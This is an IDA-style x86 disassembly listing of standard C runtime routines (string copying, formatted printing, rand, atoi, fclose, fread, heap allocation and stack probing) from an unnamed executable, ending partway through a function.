loc_412B9A: ; CODE XREF: sub_412A80+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412BAA: ; CODE XREF: sub_412A80+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_412A80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BB5 proc near ; CODE XREF: sub_401000+19�p
; sub_401000+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412C07
dec [ebp+var_1C]
js short loc_412BFA
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412C07
; ---------------------------------------------------------------------------
loc_412BFA: ; CODE XREF: sub_412BB5+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412C07: ; CODE XREF: sub_412BB5+36�j
; sub_412BB5+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412BB5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C10 proc near ; CODE XREF: sub_401141+2CF�p
; sub_4078FA+3B62�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_412C37
xor eax, eax
jmp short loc_412C39
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412C10+21�j
mov eax, edi
loc_412C39: ; CODE XREF: sub_412C10+25�j
cld
pop edi
leave
retn
sub_412C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412C40 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_412CDF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_412C6C
shr ecx, 2
jnz loc_412CEF
jmp short loc_412C93
; ---------------------------------------------------------------------------
loc_412C6C: ; CODE XREF: sub_412C40+1F�j
; sub_412C40+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_412CA6
test al, al
jz short loc_412CAE
test esi, 3
jnz short loc_412C6C
mov ebx, ecx
shr ecx, 2
jnz short loc_412CEF
loc_412C8E: ; CODE XREF: sub_412C40+AD�j
and ebx, 3
jz short loc_412CA6
loc_412C93: ; CODE XREF: sub_412C40+2A�j
; sub_412C40+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_412CD8
sub ebx, 1
jnz short loc_412C93
loc_412CA6: ; CODE XREF: sub_412C40+39�j
; sub_412C40+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_412CAE: ; CODE XREF: sub_412C40+3D�j
test edi, 3
jz short loc_412CCC
loc_412CB6: ; CODE XREF: sub_412C40+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_412D5C
test edi, 3
jnz short loc_412CB6
loc_412CCC: ; CODE XREF: sub_412C40+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_412D47
loc_412CD3: ; CODE XREF: sub_412C40+9B�j
; sub_412C40+116�j
mov [edi], al
add edi, 1
loc_412CD8: ; CODE XREF: sub_412C40+5F�j
sub ebx, 1
jnz short loc_412CD3
pop ebx
pop esi
loc_412CDF: ; CODE XREF: sub_412C40+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_412CE5: ; CODE XREF: sub_412C40+C7�j
; sub_412C40+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_412C8E
loc_412CEF: ; CODE XREF: sub_412C40+24�j
; sub_412C40+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_412CE5
test dl, dl
jz short loc_412D39
test dh, dh
jz short loc_412D2F
test edx, 0FF0000h
jz short loc_412D25
test edx, 0FF000000h
jnz short loc_412CE5
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D25: ; CODE XREF: sub_412C40+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D2F: ; CODE XREF: sub_412C40+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_412D3D
; ---------------------------------------------------------------------------
loc_412D39: ; CODE XREF: sub_412C40+CB�j
xor edx, edx
mov [edi], edx
loc_412D3D: ; CODE XREF: sub_412C40+E3�j
; sub_412C40+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_412D53
loc_412D47: ; CODE XREF: sub_412C40+91�j
xor eax, eax
loc_412D49: ; CODE XREF: sub_412C40+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_412D49
loc_412D53: ; CODE XREF: sub_412C40+105�j
and ebx, 3
jnz loc_412CD3
loc_412D5C: ; CODE XREF: sub_412C40+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_412C40 endp
; =============== S U B R O U T I N E =======================================
sub_412D64 proc near ; CODE XREF: sub_40169B+39�p
; sub_402B1D+56�p ...
arg_0 = dword ptr 4
call sub_415456
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_412D64 endp
; =============== S U B R O U T I N E =======================================
sub_412D71 proc near ; CODE XREF: sub_401525+57�p
; sub_401525:loc_401588�p ...
call sub_415456
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_412D71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D93 proc near ; CODE XREF: sub_401525+4A�p
; sub_402B1D+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_416000
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_41554C
add esp, 10h
leave
retn
sub_412D93 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412DD0 proc near ; CODE XREF: sub_4028A8+8�p
; sub_4039DE+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_412DE5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_412DE5: ; CODE XREF: sub_412DD0+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_412DEA: ; CODE XREF: sub_412DD0+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_412DEA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_412DD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E0D proc near ; CODE XREF: sub_401BBB+46�p
; sub_401C33+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412E5E
dec [ebp+var_1C]
js short loc_412E51
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412E5E
; ---------------------------------------------------------------------------
loc_412E51: ; CODE XREF: sub_412E0D+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412E5E: ; CODE XREF: sub_412E0D+35�j
; sub_412E0D+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412E0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E64 proc near ; CODE XREF: sub_401CA7+19�p
; sub_404592+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_414CA3
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_412EB4
dec [ebp+var_1C]
js short loc_412EA7
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_412EB4
; ---------------------------------------------------------------------------
loc_412EA7: ; CODE XREF: sub_412E64+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_414AFC
pop ecx
pop ecx
loc_412EB4: ; CODE XREF: sub_412E64+34�j
; sub_412E64+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_412E64 endp
; =============== S U B R O U T I N E =======================================
sub_412EBA proc near ; CODE XREF: sub_412F42�j
; sub_41CB47+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_415456
mov edi, [eax+64h]
cmp edi, off_42C7BC
jz short loc_412ED3
call sub_41628E
mov edi, eax
loc_412ED3: ; CODE XREF: sub_412EBA+10�j
mov esi, [esp+8+arg_0]
loc_412ED7: ; CODE XREF: sub_412EBA+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_412EEE
push 8
push eax
push edi
call sub_41608B
add esp, 0Ch
jmp short loc_412EF8
; ---------------------------------------------------------------------------
loc_412EEE: ; CODE XREF: sub_412EBA+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_412EF8: ; CODE XREF: sub_412EBA+32�j
test eax, eax
jz short loc_412EFF
inc esi
jmp short loc_412ED7
; ---------------------------------------------------------------------------
loc_412EFF: ; CODE XREF: sub_412EBA+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_412F0F
cmp ecx, 2Bh
jnz short loc_412F13
loc_412F0F: ; CODE XREF: sub_412EBA+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_412F13: ; CODE XREF: sub_412EBA+53�j
xor eax, eax
loc_412F15: ; CODE XREF: sub_412EBA+7C�j
cmp ecx, 30h
jl short loc_412F24
cmp ecx, 39h
jg short loc_412F24
sub ecx, 30h
jmp short loc_412F27
; ---------------------------------------------------------------------------
loc_412F24: ; CODE XREF: sub_412EBA+5E�j
; sub_412EBA+63�j
or ecx, 0FFFFFFFFh
loc_412F27: ; CODE XREF: sub_412EBA+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_412F38
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_412F15
; ---------------------------------------------------------------------------
loc_412F38: ; CODE XREF: sub_412EBA+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_412F41
neg eax
locret_412F41: ; CODE XREF: sub_412EBA+83�j
retn
sub_412EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_412F42 proc near ; CODE XREF: sub_401D45+63�p
; sub_402B1D+3FE�p ...
jmp sub_412EBA
sub_412F42 endp
; =============== S U B R O U T I N E =======================================
sub_412F47 proc near ; CODE XREF: sub_412F93+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
loc_412F4D: ; DATA XREF: .rdata:off_4271AC�o
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_412F8A
push esi
call sub_41644D
push esi
mov edi, eax
call sub_416422
push dword ptr [esi+10h]
call sub_416387
add esp, 0Ch
test eax, eax
jge short loc_412F78
or edi, 0FFFFFFFFh
jmp short loc_412F8A
; ---------------------------------------------------------------------------
loc_412F78: ; CODE XREF: sub_412F47+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_412F8A
push eax
call sub_412FE4
and dword ptr [esi+1Ch], 0
pop ecx
loc_412F8A: ; CODE XREF: sub_412F47+D�j
; sub_412F47+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_412F47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F93 proc near ; CODE XREF: sub_402A8B+74�p
; sub_4078FA+3443�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_4276F0
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_412FB9
and dword ptr [esi+0Ch], 0
loc_412FB0: ; CODE XREF: sub_412F93+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_412FB9: ; CODE XREF: sub_412F93+17�j
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_412F47
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_412FDC
jmp short loc_412FB0
sub_412F93 endp
; =============== S U B R O U T I N E =======================================
sub_412FD9 proc near ; DATA XREF: .rdata:stru_4276F0�o
mov esi, [ebp+8]
sub_412FD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412FDC proc near ; CODE XREF: sub_412F93+3F�p
push esi
call sub_4166C5
pop ecx
retn
sub_412FDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FE4 proc near ; CODE XREF: sub_402717+74�p
; sub_40556E+CC�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00413040 SIZE 00000015 BYTES
push 0Ch
push offset stru_427700
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_41304F
cmp dword_47A640, 3
jnz short loc_413040
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41697A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_413023
push esi
push eax
call sub_4169A5
pop ecx
pop ecx
loc_413023: ; CODE XREF: sub_412FE4+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413037
cmp [ebp+var_1C], 0
jnz short loc_41304F
push [ebp+arg_0]
jmp short loc_413041
sub_412FE4 endp
; =============== S U B R O U T I N E =======================================
sub_413037 proc near ; CODE XREF: sub_412FE4+43�p
; DATA XREF: .rdata:stru_427700�o
push 4
call sub_41686D
pop ecx
retn
sub_413037 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_412FE4
loc_413040: ; CODE XREF: sub_412FE4+1A�j
push esi
loc_413041: ; CODE XREF: sub_412FE4+51�j
push 0
push dword_47A63C
call ds:dword_41F134 ; RtlFreeHeap
loc_41304F: ; CODE XREF: sub_412FE4+11�j
; sub_412FE4+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_412FE4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413055 proc near ; CODE XREF: sub_41313E+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_413079
xor eax, eax
jmp loc_413124
; ---------------------------------------------------------------------------
loc_413079: ; CODE XREF: sub_413055+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41308D
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_413099
; ---------------------------------------------------------------------------
loc_41308D: ; CODE XREF: sub_413055+2E�j
mov [ebp+var_4], 1000h
jmp short loc_413099
; ---------------------------------------------------------------------------
loc_413096: ; CODE XREF: sub_413055+C5�j
mov ecx, [ebp+arg_0]
loc_413099: ; CODE XREF: sub_413055+36�j
; sub_413055+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_4130CB
mov eax, [esi+4]
test eax, eax
jz short loc_4130CB
cmp ecx, eax
mov edi, ecx
jb short loc_4130B0
mov edi, eax
loc_4130B0: ; CODE XREF: sub_413055+57�j
push edi
push dword ptr [esi]
push ebx
call sub_4177B0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_413116
; ---------------------------------------------------------------------------
loc_4130CB: ; CODE XREF: sub_413055+4A�j
; sub_413055+51�j
cmp ecx, [ebp+var_4]
jb short loc_4130FE
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_4130E1
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_4130E1: ; CODE XREF: sub_413055+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_417703
add esp, 0Ch
test eax, eax
jz short loc_413128
cmp eax, 0FFFFFFFFh
jz short loc_413138
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_413116
; ---------------------------------------------------------------------------
loc_4130FE: ; CODE XREF: sub_413055+79�j
push esi
call sub_417455
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41312C
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_413116: ; CODE XREF: sub_413055+74�j
; sub_413055+A7�j
cmp [ebp+arg_0], 0
jnz loc_413096
mov eax, [ebp+arg_8]
loc_413123: ; CODE XREF: sub_413055+E1�j
pop esi
loc_413124: ; CODE XREF: sub_413055+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413128: ; CODE XREF: sub_413055+9B�j
or dword ptr [esi+0Ch], 10h
loc_41312C: ; CODE XREF: sub_413055+B3�j
; sub_413055+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_413123
; ---------------------------------------------------------------------------
loc_413138: ; CODE XREF: sub_413055+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_41312C
sub_413055 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41313E proc near ; CODE XREF: sub_402A8B+47�p
; sub_410A22+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_427710
call __SEH_prolog
push [ebp+arg_C]
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413055
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413180
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41313E endp
; =============== S U B R O U T I N E =======================================
sub_413180 proc near ; CODE XREF: sub_41313E+34�p
; DATA XREF: .rdata:stru_427710�o
push dword ptr [ebp+14h]
call sub_4166C5
pop ecx
retn
sub_413180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41318A proc near ; CODE XREF: sub_41965E+34�p
; sub_41965E+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004132FB SIZE 0000003C BYTES
push 14h
push offset stru_427720
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_4131AD
push [ebp+arg_4]
call sub_41344D
pop ecx
jmp loc_413331
; ---------------------------------------------------------------------------
loc_4131AD: ; CODE XREF: sub_41318A+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_4131C0
push edi
call sub_412FE4
pop ecx
jmp loc_41332F
; ---------------------------------------------------------------------------
loc_4131C0: ; CODE XREF: sub_41318A+28�j
cmp dword_47A640, 3
jnz loc_4132FB
loc_4131CD: ; CODE XREF: sub_41318A+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_4132CA
push 4
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41697A
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_41329A
cmp esi, dword_47A62C
ja short loc_41324A
push esi
push edi
push eax
call sub_416E7A
add esp, 0Ch
test eax, eax
jz short loc_413212
mov [ebp+var_1C], edi
jmp short loc_41324A
; ---------------------------------------------------------------------------
loc_413212: ; CODE XREF: sub_41318A+81�j
push esi
call sub_417159
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41324A
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_41322D
mov eax, esi
loc_41322D: ; CODE XREF: sub_41318A+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_4177B0
push edi
call sub_41697A
mov [ebp+var_20], eax
push edi
push eax
call sub_4169A5
add esp, 18h
loc_41324A: ; CODE XREF: sub_41318A+72�j
; sub_41318A+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_41329A
cmp esi, ebx
jnz short loc_413259
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_413259: ; CODE XREF: sub_41318A+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_47A63C
call ds:dword_41F13C ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41329A
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_413284
mov eax, esi
loc_413284: ; CODE XREF: sub_41318A+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_4177B0
push edi
push [ebp+var_20]
call sub_4169A5
add esp, 14h
loc_41329A: ; CODE XREF: sub_41318A+66�j
; sub_41318A+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4132F2
cmp [ebp+var_20], ebx
jnz short loc_4132CA
cmp esi, ebx
jnz short loc_4132AF
xor esi, esi
inc esi
loc_4132AF: ; CODE XREF: sub_41318A+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_47A63C
call ds:dword_41F138 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_4132CA: ; CODE XREF: sub_41318A+49�j
; sub_41318A+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_413331
cmp dword_47A014, ebx
jz short loc_413331
push esi
call sub_417AED
pop ecx
test eax, eax
jnz loc_4131CD
jmp short loc_41332F
sub_41318A endp
; =============== S U B R O U T I N E =======================================
sub_4132EA proc near ; DATA XREF: .rdata:stru_427720�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_4132EA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4132F2 proc near ; CODE XREF: sub_41318A+114�p
push 4
call sub_41686D
pop ecx
retn
sub_4132F2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41318A
loc_4132FB: ; CODE XREF: sub_41318A+3D�j
; sub_41318A+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_413318
cmp esi, ebx
jnz short loc_413309
xor esi, esi
inc esi
loc_413309: ; CODE XREF: sub_41318A+17A�j
push esi
push edi
push ebx
push dword_47A63C
call ds:dword_41F138 ; RtlReAllocateHeap
loc_413318: ; CODE XREF: sub_41318A+176�j
cmp eax, ebx
jnz short loc_413331
cmp dword_47A014, ebx
jz short loc_413331
push esi
call sub_417AED
pop ecx
test eax, eax
jnz short loc_4132FB
loc_41332F: ; CODE XREF: sub_41318A+31�j
; sub_41318A+15E�j
xor eax, eax
loc_413331: ; CODE XREF: sub_41318A+1E�j
; sub_41318A+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41318A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413337 proc near ; CODE XREF: sub_413393+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_427730
call __SEH_prolog
call sub_417CF5
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_41335E
call sub_417C70
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_413383
; ---------------------------------------------------------------------------
loc_41335E: ; CODE XREF: sub_413337+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417B08
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413389
mov eax, [ebp+var_20]
loc_413383: ; CODE XREF: sub_413337+25�j
call __SEH_epilog
retn
sub_413337 endp
; =============== S U B R O U T I N E =======================================
sub_413389 proc near ; CODE XREF: sub_413337+44�p
; DATA XREF: .rdata:stru_427730�o
push dword ptr [ebp-1Ch]
call sub_4166C5
pop ecx
retn
sub_413389 endp
; =============== S U B R O U T I N E =======================================
sub_413393 proc near ; CODE XREF: sub_402A8B+2A�p
; sub_4078FA+33EE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_413337
add esp, 0Ch
retn
sub_413393 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4133A6 proc near ; CODE XREF: sub_413421+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_427740
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_47A640, 3
jnz short loc_4133EC
cmp esi, dword_47A62C
ja short loc_4133EC
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_417159
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413418
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_41340F
loc_4133EC: ; CODE XREF: sub_4133A6+16�j
; sub_4133A6+1E�j
test esi, esi
jnz short loc_4133F1
inc esi
loc_4133F1: ; CODE XREF: sub_4133A6+48�j
cmp dword_47A640, 1
jz short loc_413400
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_413400: ; CODE XREF: sub_4133A6+52�j
push esi
push 0
push dword_47A63C
call ds:dword_41F13C ; RtlAllocateHeap
loc_41340F: ; CODE XREF: sub_4133A6+44�j
call __SEH_epilog
retn
sub_4133A6 endp
; =============== S U B R O U T I N E =======================================
sub_413415 proc near ; DATA XREF: .rdata:stru_427740�o
mov esi, [ebp+8]
sub_413415 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413418 proc near ; CODE XREF: sub_4133A6+3A�p
push 4
call sub_41686D
pop ecx
retn
sub_413418 endp
; =============== S U B R O U T I N E =======================================
sub_413421 proc near ; CODE XREF: sub_41344D+A�p
; sub_413A90+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_41344A
loc_413428: ; CODE XREF: sub_413421+27�j
push [esp+arg_0]
call sub_4133A6
test eax, eax
pop ecx
jnz short locret_41344C
cmp [esp+arg_4], eax
jz short locret_41344C
push [esp+arg_0]
call sub_417AED
test eax, eax
pop ecx
jnz short loc_413428
